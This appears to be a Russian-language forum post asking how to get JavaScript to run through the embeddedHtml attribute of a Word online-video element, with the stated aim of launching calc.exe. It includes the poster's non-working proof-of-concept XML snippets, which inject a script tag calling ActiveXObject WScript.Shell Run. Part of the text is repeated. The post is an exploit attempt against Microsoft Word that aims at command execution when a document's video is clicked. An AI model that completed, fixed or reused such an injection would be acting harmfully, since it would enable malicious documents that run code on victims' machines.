Всем привет, меня интересует один вопрос, если смотреть видео от codeby , то в нем вставляют html вставку вместо видео, поизучав дополнительно об этом я нашел файл на гите в котором говорится о HTML/JS инжекте.
Так вот, сам вопрос, как произвести JS инжект(хочу вызвать калькулятор), кто-нибудь пробовал/реализовывал ?
PS мои успехи в это деле(я пытался)
заменял embeddedHtml на
word открывается без ошибок, но кликая на видео word говорил, что не правильно указан URL
еще делал так
тут уже лучше, ошибки нет, но и калькулятор не запускается, в чем может быть ошибка?
PSS Word365(лицензия)
PSSS идентификатора CVE у нее, вроде бы, нет.
Так вот, сам вопрос, как произвести JS инжект(хочу вызвать калькулятор), кто-нибудь пробовал/реализовывал ?
PS мои успехи в это деле(я пытался)
HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml="<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>заменял embeddedHtml на
HTML:
<script>
var ws = new ActiveXObject("WScript.Shell").Run("C:\\WINDOWS\\system32\\calc.exe",0);
</script>word открывается без ошибок, но кликая на видео word говорил, что не правильно указан URL
еще делал так
HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml=
"
<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>
<script>
var ws = new ActiveXObject("WScript.Shell").Run("C:\\WINDOWS\\system32\\calc.exe",0);
</script>
"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>тут уже лучше, ошибки нет, но и калькулятор не запускается, в чем может быть ошибка?
PSS Word365(лицензия)
PSSS идентификатора CVE у нее, вроде бы, нет.